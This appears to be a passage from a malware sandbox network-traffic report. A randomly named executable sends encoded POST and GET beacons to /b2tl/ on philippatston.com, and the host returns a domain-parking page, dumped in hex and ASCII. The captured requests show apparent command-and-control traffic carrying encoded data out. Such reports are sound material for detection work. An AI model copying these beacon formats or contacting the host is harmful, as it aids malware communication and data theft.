                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:01:59.690732956 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 12:01:59.690747976 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 12:01:59.690762997 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 12:01:59.690774918 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 12:01:59.690911055 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 12:01:59.691029072 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 12:01:59.691169977 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 12:01:59.691211939 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 12:01:59.691260099 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    55192.168.11.2049787184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:02.214879036 CEST1289OUTPOST /b2tl/ HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Length: 6424
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Origin: http://www.philippatston.com
                                                                                                                                                    Referer: http://www.philippatston.com/b2tl/
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Data Raw: 50 62 47 3d 62 4b 50 2f 56 38 64 77 61 4a 4d 7a 4e 4c 4a 41 52 59 66 71 70 68 42 77 46 33 55 66 4e 46 6e 69 71 56 41 45 4d 73 4f 4f 65 49 4b 79 76 2b 64 31 48 42 42 49 32 53 33 7a 77 69 56 45 6f 34 5a 64 6f 47 33 34 38 70 6e 70 4f 53 35 37 64 78 35 64 5a 6c 41 6a 68 48 5a 43 35 2b 6d 6b 59 33 43 39 65 68 72 58 65 44 66 58 2b 73 4c 74 37 54 68 6d 73 33 76 4d 7a 46 38 63 50 2f 51 79 54 39 4c 62 38 76 74 78 6a 4a 74 66 62 4b 69 43 77 4a 59 59 2f 69 59 47 72 5a 53 54 67 71 36 57 2b 4b 64 4e 6e 76 4d 49 64 33 4d 70 74 65 34 49 46 56 79 59 67 55 6e 61 4a 43 33 57 55 71 66 6e 56 70 56 67 39 5a 58 56 65 34 59 6d 68 75 39 46 51 64 78 2b 79 79 45 4f 68 4e 36 34 47 73 38 43 39 58 45 5a 7a 56 63 38 66 6d 38 36 34 6f 65 37 43 69 69 46 6f 4d 53 4e 58 76 70 55 68 79 64 67 35 76 77 42 53 38 6e 4f 48 56 4c 55 39 72 2f 45 79 49 55 4b 49 37 4a 77 6c 74 5a 49 6a 30 48 4f 66 4d 52 58 58 64 79 56 77 73 2f 67 55 53 6b 54 4b 31 54 76 74 4b 2f 36 53 4e 76 4d 76 52 4c 70 66 55 76 57 4e 6e 6d 30 6b 75 4f 6d 4f 35 4c 58 38 50 [TRUNCATED]
                                                                                                                                                    Data Ascii: PbG=bKP/V8dwaJMzNLJARYfqphBwF3UfNFniqVAEMsOOeIKyv+d1HBBI2S3zwiVEo4ZdoG348pnpOS57dx5dZlAjhHZC5+mkY3C9ehrXeDfX+sLt7Thms3vMzF8cP/QyT9Lb8vtxjJtfbKiCwJYY/iYGrZSTgq6W+KdNnvMId3Mpte4IFVyYgUnaJC3WUqfnVpVg9ZXVe4Ymhu9FQdx+yyEOhN64Gs8C9XEZzVc8fm864oe7CiiFoMSNXvpUhydg5vwBS8nOHVLU9r/EyIUKI7JwltZIj0HOfMRXXdyVws/gUSkTK1TvtK/6SNvMvRLpfUvWNnm0kuOmO5LX8PRFHxkAcdo5/Rirm7VpQwthOG/rrq4dm7lptax2P6wU3X35VuprQO1HAs2NcKwOgklkWG+9xhC5iYThvdgsSyER6bcfLbVGVpo2LDqSXXZcSegOvif01h3zBl4Hqyfl7P0wNiG9dyqbxh6gWKSzinTK170UljDIJP7Afz0JF3lb7fhP6XQqZhJP73ZqCyl5rV3Uu/UDkzstua2FkpTEDfsbcH637TQuXO6IjaKdwnQD/OX5N5qU072VDT42a6e2T0CzGsL1o2+1Ih51Pq9UESiUgdB8Fra2kR3U8dW6r9EMVGsZozRl6JcXCtdU4FaXRuFFmlCKoOtO0nsaXbzalfoE9YUOa5x0JExSkt4w12hd++2IL5Sf+ZrIbsY+ps3aEOD0mlE9CBRzWr28se4cgue6asCgk5T0TioiKu0shXstMqHokIEtsq19r2FGik0FpfcPK
                                                                                                                                                    Oct 4, 2024 12:02:02.214931011 CEST5635OUTData Raw: 4a 79 53 65 47 2b 41 37 7a 50 35 4d 54 73 59 6e 65 68 56 31 59 45 56 6a 7a 72 4f 47 4d 63 52 55 4e 52 56 50 71 79 30 74 66 7a 7a 49 30 52 39 6c 70 6d 34 37 7a 63 73 42 32 70 6b 43 36 79 69 6a 51 65 59 44 35 58 4c 75 4f 4d 4f 63 57 77 6f 31 2f 4b
                                                                                                                                                    Data Ascii: JySeG+A7zP5MTsYnehV1YEVjzrOGMcRUNRVPqy0tfzzI0R9lpm47zcsB2pkC6yijQeYD5XLuOMOcWwo1/KShqFEPDVg3xC72myCiDYaVAS+urkk8l4Aipt3TdbLZUDxurpOA54qpRGmUZfxapRDOTEnqD6DgAevzmmq3qR71pRJnP28xLfv8a1W71HwYGfye9eXunrYCb8Dw/pHj70yuEDMUlbGu9zl/LyK4A2OdKz9CcrAwF7D
                                                                                                                                                    Oct 4, 2024 12:02:02.318686008 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:02 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:02.318715096 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 12:02:02.318738937 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 12:02:02.318779945 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 12:02:02.318793058 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
                                                                                                                                                    Oct 4, 2024 12:02:02.318805933 CEST1289INData Raw: 2e 37 35 36 32 36 6c 2d 31 32 2e 38 31 37 2c 32 32 2e 31 39 39 31 39 61 31 2e 32 34 35 33 37 2c 31 2e 32 34 35 33 37 2c 30 2c 30 2c 31 2d 31 2e 37 30 32 30 39 2e 34 35 38 35 38 4c 35 30 39 2e 34 35 38 2c 33 30 2e 30 30 34 31 32 61 31 2e 32 34 36
                                                                                                                                                    Data Ascii: .75626l-12.817,22.19919a1.24537,1.24537,0,0,1-1.70209.45858L509.458,30.00412a1.24616,1.24616,0,0,1-.45656-1.70176l12.814-22.19784A1.30157,1.30157,0,0,1,523.55018,5.59211Z" class="cls-2"></path><path d="M543.79932,23.73541l2.86856,4.971a1.305,1
                                                                                                                                                    Oct 4, 2024 12:02:02.318819046 CEST1289INData Raw: 37 31 2c 31 2e 32 35 37 37 31 2c 30 2c 30 2c 31 2c 2e 34 35 33 35 33 2d 31 2e 37 30 32 30 39 6c 34 2e 39 37 31 2d 32 2e 38 36 38 32 32 61 31 2e 32 34 38 39 32 2c 31 2e 32 34 38 39 32 2c 30 2c 30 2c 31 2c 31 2e 37 30 32 31 2e 34 35 38 32 34 6c 31
                                                                                                                                                    Data Ascii: 71,1.25771,0,0,1,.45353-1.70209l4.971-2.86822a1.24892,1.24892,0,0,1,1.7021.45824l12.82036,22.19616A1.306,1.306,0,0,1,490.17148,30.00412Z" class="cls-2"></path><path d="M502.683,28.189h-5.73981a1.3064,1.3064,0,0,1-1.2452-1.30947V1.24856A1.25352
                                                                                                                                                    Oct 4, 2024 12:02:02.318857908 CEST1289INData Raw: 36 2e 37 35 35 36 39 2c 31 35 32 2e 38 31 36 34 39 2c 31 34 37 2e 35 39 33 34 34 5a 4d 31 33 38 2e 31 38 38 37 33 2c 38 36 2e 35 38 31 32 35 61 38 30 2e 38 33 36 33 33 2c 38 30 2e 38 33 36 33 33 2c 30 2c 30 2c 30 2d 31 33 2e 33 37 30 37 39 2d 2e
                                                                                                                                                    Data Ascii: 6.75569,152.81649,147.59344ZM138.18873,86.58125a80.83633,80.83633,0,0,0-13.37079-.97772c-11.97958,0-14.907,8.5017-14.907,19.92245v10.726c0,11.42072,2.92744,19.92076,14.907,19.92076a81.24455,81.24455,0,0,0,13.37079-.9757Z" class="cls-2"></path>
                                                                                                                                                    Oct 4, 2024 12:02:02.318871021 CEST1289INData Raw: 30 34 34 2d 37 2e 35 32 30 36 33 2d 33 33 2e 37 31 30 34 34 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 39 34 33 35 31 63 30 2d 32 31 2e 37 32 39 35 31 2c 31 32 2e 31 31 37 31 39 2d 33 35 2e 33 38 31 35 37 2c 33 33 2e 34 32 39 35 2d 33 35 2e 33 38
                                                                                                                                                    Data Ascii: 044-7.52063-33.71044-34.96235V105.94351c0-21.72951,12.11719-35.38157,33.4295-35.38157,21.45363,0,33.15362,14.62776,33.15362,35.38157v7.7982C347.291,115.97606,346.45491,117.228,344.50486,117.228Zm-15.73972-13.65374c0-10.86391-5.98978-17.1343-14
                                                                                                                                                    Oct 4, 2024 12:02:02.318905115 CEST1189INData Raw: 36 2d 32 30 2e 32 33 33 2c 31 39 2e 34 31 38 31 31 2d 32 30 2e 32 33 33 73 31 39 2e 34 32 31 34 38 2c 38 2e 36 31 35 31 2c 31 39 2e 34 32 31 34 38 2c 32 30 2e 32 33 33 56 31 33 30 2e 35 31 38 43 38 31 38 2e 39 38 30 37 2c 31 34 32 2e 31 33 39 36
                                                                                                                                                    Data Ascii: 6-20.233,19.41811-20.233s19.42148,8.6151,19.42148,20.233V130.518C818.9807,142.13962,812.314,150.74765,799.55922,150.74765Zm8.69383-26.81055c0-6.66-3.00617-10.97058-8.69383-10.97058-5.68732,0-8.69382,4.31058-8.69382,10.97058V130.518c0,6.66336,3


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    56192.168.11.2049788184.73.212.51801136C:\Program Files (x86)\JwFozcCUjxCoQjCWtmBoWGaowLDxYZsLgBTRssLUdsTXCJVAzkZNacROmYRUROgyWafh\qnFwqCOYxcUlZ.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 4, 2024 12:02:04.839783907 CEST431OUTGET /b2tl/?PbG=WInfWL97QekdPalSc67opDsfGENLX06TmGNVEv6Geo+doMJXHAo9/Rqdqw5O1dkupHqa0ILlPiguACBnPWEgxg52+Lm0TB3eeiGyfSWC0M759S5RsmGy+TM=&m2W4y=eLqP3zSpfDT HTTP/1.1
                                                                                                                                                    Host: www.philippatston.com
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                    Accept-Language: en-US,en
                                                                                                                                                    Connection: close
                                                                                                                                                    User-Agent: Mozilla/5.0 (Android; Linux armv7l; rv:5.0) Gecko/20110615 Firefox/5.0 Fennec/5.0
                                                                                                                                                    Oct 4, 2024 12:02:04.940937996 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 04 Oct 2024 10:02:04 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 33 31 35 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                                                                                                                                    Data Ascii: 315a<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                                                                                                                                    Oct 4, 2024 12:02:04.941031933 CEST1289INData Raw: 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20
                                                                                                                                                    Data Ascii: min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex; flex-direction: column; align-items: ce
                                                                                                                                                    Oct 4, 2024 12:02:04.941099882 CEST1289INData Raw: 20 20 20 20 20 20 20 20 3c 68 31 3e 70 68 69 6c 69 70 70 61 74 73 74 6f 6e 2e 63 6f 6d 20 69 73 20 63 6f 6d 69 6e 67 20 73 6f 6f 6e 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <h1>philippatston.com is coming soon</h1> </div> <div>This domain is managed at <br> <a href="//www.namebright.com" id="logo" target="_parent" alt="NameBright.com - Next Generation Domain Regi
                                                                                                                                                    Oct 4, 2024 12:02:04.941164017 CEST1289INData Raw: 2d 33 33 2e 30 31 32 33 61 37 39 2e 34 34 37 31 33 2c 37 39 2e 34 34 37 31 33 2c 30 2c 30 2c 30 2d 31 33 2e 36 34 38 37 2e 39 37 35 37 76 36 30 2e 31 37 34 34 33 61 32 2e 38 30 34 35 37 2c 32 2e 38 30 34 35 37 2c 30 2c 30 2c 31 2d 32 2e 36 34 38
                                                                                                                                                    Data Ascii: -33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H446.56779a2.91881,2.91881,0,0,1-2.78613-2.92778V78.77935c0-1.81043,1.25192-3.34127,3.76218-4.17768,8.91384-2.92408,16.29653-4.03973,28.27274-4.03973,1
                                                                                                                                                    Oct 4, 2024 12:02:04.941220045 CEST1289INData Raw: 39 35 39 32 34 2c 35 35 33 2e 38 33 33 38 39 2c 31 37 37 2e 39 35 39 32 34 5a 4d 35 36 36 2e 37 38 35 38 2c 38 36 2e 38 35 38 38 32 61 37 36 2e 33 36 38 33 35 2c 37 36 2e 33 36 38 33 35 2c 30 2c 30 2c 30 2d 31 33 2e 33 36 39 34 34 2d 31 2e 32 35
                                                                                                                                                    Data Ascii: 95924,553.83389,177.95924ZM566.7858,86.85882a76.36835,76.36835,0,0,0-13.36944-1.25529c-11.98261,0-14.90668,8.5017-14.90668,19.92245v10.726c0,11.42072,2.92407,19.92076,14.90668,19.92076a116.75844,116.75844,0,0,0,13.36944-1.117Zm93.44986,63.2418
